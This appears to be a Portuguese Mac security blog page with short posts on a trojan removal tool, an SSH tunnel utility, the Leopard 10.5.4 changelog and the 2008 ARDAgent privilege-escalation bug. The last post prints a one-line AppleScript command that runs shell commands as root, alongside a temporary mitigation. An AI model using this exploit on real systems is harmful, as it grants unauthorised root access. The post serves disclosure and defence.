últimos posts
30 janeiro, 2009 Postado por: Eduardo Medeiros
SecureMac lançou iServices Trojan Removal Tool 1.1, trata-se de um utilitário para auxiliar na remoção do OSX.Trojan.iServices.
Clique aqui para saber mais.
Categoria OSX, Segurança | Sem comentários »
9 dezembro, 2008 Postado por: Eduardo Medeiros
O iSSH oferece uma maneira simples de iniciar uma conexão SSH Tunel, para aqueles que não sabem como utilizar o terminal ou simplesmente não precisa dele.
Categoria OSX, Segurança | Sem comentários »
1 julho, 2008 Postado por: Eduardo Medeiros
Apple liberou ontem o update 10.5.4 para Leopard.
Segue o changelog:
What’s included?
The 10.5.4 Update is recommended for all users running Mac OS X Leopard and includes general operating system fixes that enhance the stability, compatibility and security of your Mac.
General
- Includes recent Apple security updates.
- Resolves an issue with saving and reopening Adobe Creative Suite 3 files on a remote server.
- Includes additional RAW image support for several cameras.
- Addresses an issue that may result in a partially installed X11 application.
- Improves L2TP VPN client reliability.
AirPort
- Addresses AirPort reliability issues with 5GHz networks.
- Addresses AirPort issues that may result in slower performance in Logic Studio or MainStage.
iCal
- Improves overall iCal reliability for meeting requests, cancellation notices, delegation, and syncing with iPhone.
- Resolves an issue that prevents deleting an iCal event without notifying the creator.
- Addresses an issue in which events in all calendars affect availability. A checkbox now enables information-only calendars to be transparent from free/busy lookups.
- Resolves a UI issue preventing delegated calendars from showing up as a separate window.
- Addresses an issue with copying and pasting attendees from one event to another.
- Resolves an issue in which iCal may not delete events after a specified time interval, even when set to do so in iCal preferences.
- Addresses an issue in which To Dos cannot be marked private.
Safari
- Addresses a potential performance issue when loading secure web pages.
- Resolves issues that may be encountered when accessing secure web pages with client certificates that reside on a smart card.
Spaces and Exposé
- Addresses an issue in which switching from a space with a Finder window keeps the Finder as the active application instead of the application residing in the destination space.
- Fixes an issue in which dragging an application from the list of application assignments in Spaces System Preferences does not assign the application to the desired space.
- Resolves an Exposé issue that may result in only a subset of windows being shown.
Pois é.. corrigir o bug do Apple Remote Desktop (ARDAgent) nada?
Sinceramente… estou começando a ficar preocupado com a Apple.
Será que a qualidade vai cair ?
Abraços.
Categoria OSX, Segurança | Sem comentários »
19 junho, 2008 Postado por: Eduardo Medeiros
Encontrado BUG de escalação de privilégio no ARDAgent (Apple Remote Desktopt).
Com AppleScript é possivel executar comandos como usuário root.
Veja o exemplo abaixo:
# id uid=501(eduardomedeiros) gid=20(staff) groups=20(staff),102(com.apple.access_ssh),98(_lpadmin),81(_appserveradm),103(com.apple.sharepoint.group.2),79(_appserverusr),101(com.apple.sharepoint.group.1),80(admin)
Obs: note que estou logado como usuário eduardomedeiros
# osascript -e 'tell app "ARDAgent" to do shell script "id"'; uid=0(root) gid=0(wheel) egid=20(staff) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),103(com.apple.sharepoint.group.2),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff)
Obs: Repare que a saída do comando id, exibe usuário root.
Solução provisória:
chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
Obs: Ao Reparar as permissões pelo Disk Utility, a permissão do ARD voltará ao estado original.
Fonte: Slashdot.
Abraços.
Categoria OSX, Segurança | Sem comentários »
